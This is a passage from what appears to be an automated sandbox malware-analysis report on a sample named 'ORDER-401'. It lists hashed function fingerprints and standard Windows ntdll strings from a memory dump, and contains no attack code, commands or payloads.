                                                                    • Instruction ID: 387ddf4f338790a54b92dc188e01468aba9e812fa5c6fcb88153457d5488ceaa
                                                                    • Opcode Fuzzy Hash: f516d832d15ec1552a23ad59262e13ae5a513f627fda5780ab7c7cf386ec88f5
                                                                    • Instruction Fuzzy Hash: 089002A1201544924A00B2588404B0A4545A7E1211B59C416E1058960CC5698951923A
                                                                    Function 01582D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 676154fb0705f1e76928aa36f2420578b00ee8f4814e29b46ec44548c13b73ed
                                                                    • Instruction ID: 3fd3b24c7d5a2bd14786bef6d51c3abd4d59004d79317134fdc4310d9bd12d7e
                                                                    • Opcode Fuzzy Hash: 676154fb0705f1e76928aa36f2420578b00ee8f4814e29b46ec44548c13b73ed
                                                                    • Instruction Fuzzy Hash: B190022921340402D6807158540860A0045A7D2212F99D815A0019958CC95989695326
                                                                    Function 01582D00 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 10c99f4e2e16d384d33c1fdeb923924e580244f9a47042694d6973cbd6b4e4da
                                                                    • Instruction ID: 0fc98e21a17bb1a621415cfcb19c1fe1a059dd451aa541fa435bf6f380477aee
                                                                    • Opcode Fuzzy Hash: 10c99f4e2e16d384d33c1fdeb923924e580244f9a47042694d6973cbd6b4e4da
                                                                    • Instruction Fuzzy Hash: 7090022120544842D60075585408A060045A7D1215F59D411A1068995DC6798951A236
                                                                    Function 01582D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3d59830d9c27916652dbb5b85ea651a3c9197b5ef6362362b4419a2d2df71c39
                                                                    • Instruction ID: 551d112f9bbcda18c21a1015c47fc6029efc880150261f763f9067d7b956a682
                                                                    • Opcode Fuzzy Hash: 3d59830d9c27916652dbb5b85ea651a3c9197b5ef6362362b4419a2d2df71c39
                                                                    • Instruction Fuzzy Hash: B690022130140403D640715854186064045F7E2311F59D411E0418954CD95989565327
                                                                    Function 01582DD0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1bd950aa283aaf737ef3fa64bf627cafeddbdf4be2f9ca2b9f2352e9505b2bd4
                                                                    • Instruction ID: 5dcdacd10377671c5abcc8962ac6995fe2097c35a70a7ca4155577bab4a01c50
                                                                    • Opcode Fuzzy Hash: 1bd950aa283aaf737ef3fa64bf627cafeddbdf4be2f9ca2b9f2352e9505b2bd4
                                                                    • Instruction Fuzzy Hash: 89900221242445525A45B15844045074046B7E1251799C412A1418D50CC56A9956D726
                                                                    Function 01582DB0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a9ec38d05f9bd40e8c34ce86d9787c2274e43592f9d66e7ba46e98ae843d7a63
                                                                    • Instruction ID: df58773541901f3b38b9d22f8074b5ed0d9e0467a207f316631c683a646be065
                                                                    • Opcode Fuzzy Hash: a9ec38d05f9bd40e8c34ce86d9787c2274e43592f9d66e7ba46e98ae843d7a63
                                                                    • Instruction Fuzzy Hash: 9F90023124140802D641715844046060049B7D1251F99C412A0428954EC6998B56AB66
                                                                    Function 01582C60 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a29a4d2c9bedd3ebbad82927d2e017625c9006ddba3544dcec28d89599ddbf71
                                                                    • Instruction ID: dadf5864d71f6be2b01cbfb69b8895076543ac22dc7719e6546058b0062fbdf3
                                                                    • Opcode Fuzzy Hash: a29a4d2c9bedd3ebbad82927d2e017625c9006ddba3544dcec28d89599ddbf71
                                                                    • Instruction Fuzzy Hash: 8A90023120140C42D60071584404B460045A7E1311F59C416A0128A54DC659C9517626
                                                                    Function 01582CC0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 419f8f870928f750914cfab7962c62f722a973442c27a76d7e82e03cd903184d
                                                                    • Instruction ID: 22f50399ef60495f5dde94d447be60a0f5083dbe088b62baeb41b4b35339dd68
                                                                    • Opcode Fuzzy Hash: 419f8f870928f750914cfab7962c62f722a973442c27a76d7e82e03cd903184d
                                                                    • Instruction Fuzzy Hash: 8390022160540802D640715854187060055A7D1211F59D411A0028954DC69D8B5567A6
                                                                    Function 01582CF0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18fc0ee7c3a73b859847a346a771b312d5861bb8c251d9bc049ec0b96fa7f7cb
                                                                    • Instruction ID: 39710504a902527d6452ef3e3c49024933a783aecb943b06011f839c3e7e05bc
                                                                    • Opcode Fuzzy Hash: 18fc0ee7c3a73b859847a346a771b312d5861bb8c251d9bc049ec0b96fa7f7cb
                                                                    • Instruction Fuzzy Hash: 4690023120140803D600715855087070045A7D1211F59D811A0428958DD69A89516226
                                                                    Function 01582CA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 10ccae7457c10cb94ec98694bc89ae2fb9b1d106abb4ae5953a22db304cd4a32
                                                                    • Instruction ID: 18e82e91f78117ba73e8f8ea53617d63e1d8972c4cd0c4a752c31b77b27189ae
                                                                    • Opcode Fuzzy Hash: 10ccae7457c10cb94ec98694bc89ae2fb9b1d106abb4ae5953a22db304cd4a32
                                                                    • Instruction Fuzzy Hash: 9190023120140802D600759854086460045A7E1311F59D411A5028955EC6A989916236
                                                                    Function 01582F60 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 40242931eaa52f7438d9da70d9454a366f053b2c671d3e94a1d8b3ccc350f37a
                                                                    • Instruction ID: 3615967bf019df71a519cae0ac8843f305bfe2d62931143c5e128d6086bc1d9c
                                                                    • Opcode Fuzzy Hash: 40242931eaa52f7438d9da70d9454a366f053b2c671d3e94a1d8b3ccc350f37a
                                                                    • Instruction Fuzzy Hash: 5990026121140442D604715844047060085A7E2211F59C412A2158954CC56D8D61522A
                                                                    Function 01582F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1cd96f9819de59c166a58232ef63d42e8804c34a36f6aa2d9b592892335198d
                                                                    • Instruction ID: d46de6074d529087c293eae1f692a729048187db9436b37fddf5b122c01bcfc4
                                                                    • Opcode Fuzzy Hash: c1cd96f9819de59c166a58232ef63d42e8804c34a36f6aa2d9b592892335198d
                                                                    • Instruction Fuzzy Hash: F790026134140842D60071584414B060045E7E2311F59C415E1068954DC65DCD52622B
                                                                    Function 01582FE0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ae9c78aa2746dd8fac27e8b284e3c2a8b3b630a8cfea3e38c3aeb0147e612989
                                                                    • Instruction ID: aa58a6a8686dc2dc0e9b7c5de0588765f82f7fbf2fcfd316e23813088c88ab43
                                                                    • Opcode Fuzzy Hash: ae9c78aa2746dd8fac27e8b284e3c2a8b3b630a8cfea3e38c3aeb0147e612989
                                                                    • Instruction Fuzzy Hash: CB900221211C0442D70075684C14B070045A7D1313F59C515A0158954CC95989615626
                                                                    Function 01582F90 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1215c51e64cde8eaf9f65d1c6224f7d2f34a05bf66986be42aef88d56ebe2fdb
                                                                    • Instruction ID: dd727b2a718a61556fb34a7f5225de669ba18eab2fc016e6204303f8c281838a
                                                                    • Opcode Fuzzy Hash: 1215c51e64cde8eaf9f65d1c6224f7d2f34a05bf66986be42aef88d56ebe2fdb
                                                                    • Instruction Fuzzy Hash: 5590023120180802D6007158481470B0045A7D1312F59C411A1168955DC66989516676
                                                                    Function 01582FB0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 812590e789a9e53f0a166091f39f7ef561641fbd09072a15e915b7ffb728cd8e
                                                                    • Instruction ID: 8b19d1c659f8fe6024a231c5f7ed7e8f60793b09d86d408dbfa1016328d2dfbe
                                                                    • Opcode Fuzzy Hash: 812590e789a9e53f0a166091f39f7ef561641fbd09072a15e915b7ffb728cd8e
                                                                    • Instruction Fuzzy Hash: 8E900221601404424640716888449064045BBE2221759C521A099C950DC59D8965576A
                                                                    Function 01582FA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 31fd2c1c5e738fb08d4c1f7a41a672a049b6eaa6fea16ac67fd50cb003c94102
                                                                    • Instruction ID: 43bdc6840664e990efa7cb249cfac6661095ef7158ade142ca1112200c9819b1
                                                                    • Opcode Fuzzy Hash: 31fd2c1c5e738fb08d4c1f7a41a672a049b6eaa6fea16ac67fd50cb003c94102
                                                                    • Instruction Fuzzy Hash: D890023120180802D600715848087470045A7D1312F59C411A5168955EC6A9C9916636
                                                                    Function 01582E30 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 136d485278571dd27bc70a0ed1e4677505f820ace76a04948fe87c261c8cc98b
                                                                    • Instruction ID: 074f699a54574c2e01651cd1cb3d518e3852974e41ac068ff3206309840e2951
                                                                    • Opcode Fuzzy Hash: 136d485278571dd27bc70a0ed1e4677505f820ace76a04948fe87c261c8cc98b
                                                                    • Instruction Fuzzy Hash: B190022130140802D602715844146060049E7D2355F99C412E1428955DC6698A53A237
                                                                    Function 01582EE0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52b92457d53ae8972ed87d4b1c43a362f3a3c6767a1084998d38b05399039c3f
                                                                    • Instruction ID: c401f9636825637293259c0c4baa6241612b5431e0acf7a4730e1fe11dd3026d
                                                                    • Opcode Fuzzy Hash: 52b92457d53ae8972ed87d4b1c43a362f3a3c6767a1084998d38b05399039c3f
                                                                    • Instruction Fuzzy Hash: 4990026120180803D640755848046070045A7D1312F59C411A2068955ECA6D8D51623A
                                                                    Function 01582E80 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef1f2fc1c28b1f27fb067dc4ba5faa202be70450b3cb39781e0cba37398e4887
                                                                    • Instruction ID: 01baed23ab05cac38fd5b46f467f8e8420f74606a9bc42aee2cbcdf5a007c0ab
                                                                    • Opcode Fuzzy Hash: ef1f2fc1c28b1f27fb067dc4ba5faa202be70450b3cb39781e0cba37398e4887
                                                                    • Instruction Fuzzy Hash: 6990022160140902D60171584404616004AA7D1251F99C422A1028955ECA698A92A236
                                                                    Function 01582EA0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e2370e331185746ef91c833872e5ccc741512abe642b8006b8747d9fb02badd
                                                                    • Instruction ID: c8456d2bad787e51995377837224e7d2d1b84cd8a53a9cf493e0d93e7e2eced3
                                                                    • Opcode Fuzzy Hash: 3e2370e331185746ef91c833872e5ccc741512abe642b8006b8747d9fb02badd
                                                                    • Instruction Fuzzy Hash: 7690027120140802D640715844047460045A7D1311F59C411A5068954EC69D8ED5676A
                                                                    Function 01583010 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e9f24fd9679997b0e42bc97d4948da932b15baeebbb1298723ea1cce918bdd59
                                                                    • Instruction ID: 7f585a9e3d178b56a82a292ba8ada48490ac16066338e41b31b6eafcc0d13a56
                                                                    • Opcode Fuzzy Hash: e9f24fd9679997b0e42bc97d4948da932b15baeebbb1298723ea1cce918bdd59
                                                                    • Instruction Fuzzy Hash: 0790022120184842D64072584804B0F4145A7E2212F99C419A415A954CC95989555726
                                                                    Function 01583090 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3df13fefac9678256305716603fbf63dfb2ffdb538e016bcd859f3ba3098b1c2
                                                                    • Instruction ID: 5d5a963e54a80a769dc91fea45750a28d409f6e2a19d4da17bcf896795d856ef
                                                                    • Opcode Fuzzy Hash: 3df13fefac9678256305716603fbf63dfb2ffdb538e016bcd859f3ba3098b1c2
                                                                    • Instruction Fuzzy Hash: F090022124140C02D640715884147070046E7D1611F59C411A0028954DC65A8A6567B6
                                                                    Function 015839B0 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4ea85d0c977e4a2ffcf4f55d39585b13a423083a2f84bbe7c82ecbc325f83be0
                                                                    • Instruction ID: f43af17da12dd55f4ab09a052a849b5c62f8889206bd24265b6dd3bae82d8a96
                                                                    • Opcode Fuzzy Hash: 4ea85d0c977e4a2ffcf4f55d39585b13a423083a2f84bbe7c82ecbc325f83be0
                                                                    • Instruction Fuzzy Hash: 4B90022124545502D650715C44046164045B7E1211F59C421A0818994DC59989556326
                                                                    Function 01583D70 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4877f92b75eb98bce127c37f08c57be7d4383a381d969874fa6d10b420465c7a
                                                                    • Instruction ID: 2484c7abfec343591865f906021ecaf365efea099b39ec3b1c189c3f930d4cc4
                                                                    • Opcode Fuzzy Hash: 4877f92b75eb98bce127c37f08c57be7d4383a381d969874fa6d10b420465c7a
                                                                    • Instruction Fuzzy Hash: 1490023520140802DA10715858046460086A7D1311F59D811A0428958DC69889A1A226
                                                                    Function 01583D10 Relevance: .0, Instructions: 4COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d80d8da1d6f1a4db82a183e2d63f7ac19e81db043a634cc59a5a40960f160c98
                                                                    • Instruction ID: 36efb75cfa1e479c7121caec5fb3cf3d224651a7167089c435db7fa8ff94d031
                                                                    • Opcode Fuzzy Hash: d80d8da1d6f1a4db82a183e2d63f7ac19e81db043a634cc59a5a40960f160c98
                                                                    • Instruction Fuzzy Hash: 76900231202405429A4072585804A4E4145A7E2312B99D815A0019954CC95889615326
                                                                    Function 01582C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction ID: da4c7e704f53f105093408e0bfff6901c7f463c38645ef6a09fcd1767dd254b3
                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                    • Instruction Fuzzy Hash:
                                                                    Function 01582890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: f9f91821b0945cc383ab9a5feee4cf3ba57f6a1e069ef9ff1234a6091f8f641d
                                                                    • Instruction ID: 560ddc4157fa3e951fe53bbb1d7d1c5df53bd5f50ffc9865290bd97a343572ae
                                                                    • Opcode Fuzzy Hash: f9f91821b0945cc383ab9a5feee4cf3ba57f6a1e069ef9ff1234a6091f8f641d
                                                                    • Instruction Fuzzy Hash: 7C51E7B1A00216BFDF11EB9D888097EFBF8BB49240B508669F465EB641D334DE50CBA0
                                                                    Function 015F2410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                    • API String ID: 48624451-2108815105
                                                                    • Opcode ID: 62da2dc82bf7649585166077d45a8097b75f0ddcd68b261bfa8fa37b41d3f2e6
                                                                    • Instruction ID: 8102a48dacbb8cda2b67cc4477067503fc6b755a130ad1e583b375e2a6cd9493
                                                                    • Opcode Fuzzy Hash: 62da2dc82bf7649585166077d45a8097b75f0ddcd68b261bfa8fa37b41d3f2e6
                                                                    • Instruction Fuzzy Hash: 5951F7B5A00646AFCB30DF9DC89497FBBF8FB84200F04885DE696CF641E6B4DA408760
                                                                    Function 01577630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 015B4725
                                                                    • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 015B4742
                                                                    • ExecuteOptions, xrefs: 015B46A0
                                                                    • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 015B46FC
                                                                    • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 015B4655
                                                                    • Execute=1, xrefs: 015B4713
                                                                    • CLIENT(ntdll): Processing section info %ws..., xrefs: 015B4787
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                    • API String ID: 0-484625025
                                                                    • Opcode ID: acfba84301da1a9d93526fc8ddfceaa0d9aeef425bd6e2b3be99e232fbff8a64
                                                                    • Instruction ID: 95cdcef3426fb5201973140c35edb88ca6623f738079059aad9acc9acb6fada9
                                                                    • Opcode Fuzzy Hash: acfba84301da1a9d93526fc8ddfceaa0d9aeef425bd6e2b3be99e232fbff8a64
                                                                    • Instruction Fuzzy Hash: EE51FD3160021A7AEF21AEA8FC8AFEE77A9BF59704F0404A9D505AF181D7719A45CF50
                                                                    Function 0158B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: __aulldvrm
                                                                    • String ID: +$-$0$0
                                                                    • API String ID: 1302938615-699404926
                                                                    • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction ID: f041168cacb42bb34523634a303c153515c4900980cb196e9c4243e72d430434
                                                                    • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                    • Instruction Fuzzy Hash: 4681E070E1124A8EEF25BE6CC8917FEBBB9BF45320F184619D861BF291C73498408B51
                                                                    Function 015F20E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2097212523.0000000001510000.00000040.00001000.00020000.00000000.sdmp, Offset: 01510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_1510000_ORDER-401.jbxd
                                                                    Similarity
                                                                    • API ID: ___swprintf_l
                                                                    • String ID: %%%u$[$]:%u
                                                                    • API String ID: 48624451-2819853543
                                                                    • Opcode ID: 8ed2d63b5823b61fccda82c1bc43e65eb250aff6c4ae293b585f8cfc359736ad
                                                                    • Instruction ID: d5dadecee8362e8dcbdf79556917534433d78627f45f7eb56bac784746694206
